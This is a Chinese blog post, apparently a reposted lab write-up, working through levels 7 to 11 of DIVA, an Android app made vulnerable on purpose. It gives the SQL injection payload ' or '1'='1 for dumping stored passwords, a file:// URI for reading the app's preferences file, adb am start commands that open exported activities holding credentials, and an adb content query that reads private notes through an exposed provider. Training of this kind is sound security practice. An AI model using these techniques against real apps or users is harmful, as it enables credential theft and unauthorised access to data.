专栏首页信安之路Android App漏洞学习(二)

Android App漏洞学习(二)

接上一篇没写完的文章《Android App漏洞学习(一)》,下面继续剩下的几个部分。

PART 7 不安全的输入1(sqli)

打开日志:

adb logcat

输入一个单引号,在日志中可以看到报错信息,存在sql注入。

输入' or '1'='1,可返回所有用户密码。

PART 8 不安全的输入2(读取本地文件)

可访问本地的任意文件,输入

file:///data/data/jakhar.aseem.diva/shared_prefs/jakhar.aseem.diva_preferences.xml

PART 9 访问控制1(Activity 1)

查看AndroidManifest.xml文件中暴露的activity组件:

利用am(Activity Manager tool)启动暴露的组件,来绕过权限控制:

adb shell am start jakhar.aseem.diva/.APICredsActivity

adb shell am start -n jakhar.aseem.diva/.APICredsActivity -a jakhar.aseem.diva.action.VIEW_CREDS

同时也可以使用drozer来完成:

PART 10 访问控制2(Activity 2)

输入 adb shell am start jakhar.aseem.diva/.APICreds2Activity,并没有出现PART9中的情况,添加了验证PIN码。

PART 11 访问控制3(Content Providers )

查找暴露的Content Providers组件:

然后查找包含content:// 的smali文件。

$ grep -lr “content://” *

查看私有日志内容

$ adb shell content query –uri content://jakhar.aseem.diva.provider.notesprovider/notes

另一种方式:使用drozer:

本文分享自微信公众号 - 信安之路(xazlsec),作者:BoxLi

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-08-13

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • CTF 玩转 pwn 月度总结

    自从加入 RTIS 交流群, 在 7o8v 师傅, gd 大佬 的帮助下, PWN 学习之路进入加速度. 下面是 8 周学习的总结, 基本上是按照how2hea...

    信安之路
  • Java代码审计-铁人下载系统

    初学 java 代码审计,跟着表哥们脚步,走一遍审计流程,就选了个没有使用 Java 框架的 java 系统,作为入门。

    信安之路
  • 数据库查询基础

    这些字符可以用不同方式表示,比如unicode、在字符被过滤的时候可以利用其他方式绕过。

    信安之路
  • 边做算法边学go语言之LeetCode1160:拼写单词

    题目位置:https://leetcode-cn.com/problems/find-words-that-can-be-formed-by-character...

    机智的程序员小熊
  • 经典Bug永流传---每周一“虫”(二十二)

    只有华为手机自带输入法会,其他手机自带输入法不会,QQ输入法也不会,搜狗输入法拼音26键也会有这个问题

    厦门-安仔
  • 《TKE学习》TKE服务中的网络 (五)

    腾讯云私有网络(Virtual Private Cloud,VPC)是一块您在腾讯云上自定义的逻辑隔离网络空间,与您在数据中心运行的传统网络相似,托管在腾讯云私...

    baron
  • Appium+python自动化(十六)- ADB命令,知否知否,应是必知必会(超详解)

      Android 调试桥(adb)是多种用途的工具,该工具可以帮助你你管理设备或模拟器 的状态。

    北京-宏哥
  • 咦,Android Studio 3.5 Retry ?

    总会有那么一个人,让你觉得这个世界一切都是值得的。纵使结果不尽人意,曾经拥有即是最好。

    HLQ_Struggle
  • 《天涯明月刀》引擎技术和技术突破

    引言:6.14日“腾讯创新日:科技年技术盛宴”代表腾讯各个事业群技术实力的四级专家、腾讯微创新2016年度创意获奖团队欢聚一堂,一起畅谈AI、系统安全、架构设计...

    腾讯大讲堂
  • MongoDb 简单介绍

    最近一段时间使用 mongodb 做媒资数据的接入,简单介绍一下 mongodb 的特性和语法。希望对大家有所帮助。

    serena

扫码关注云+社区

领取腾讯云代金券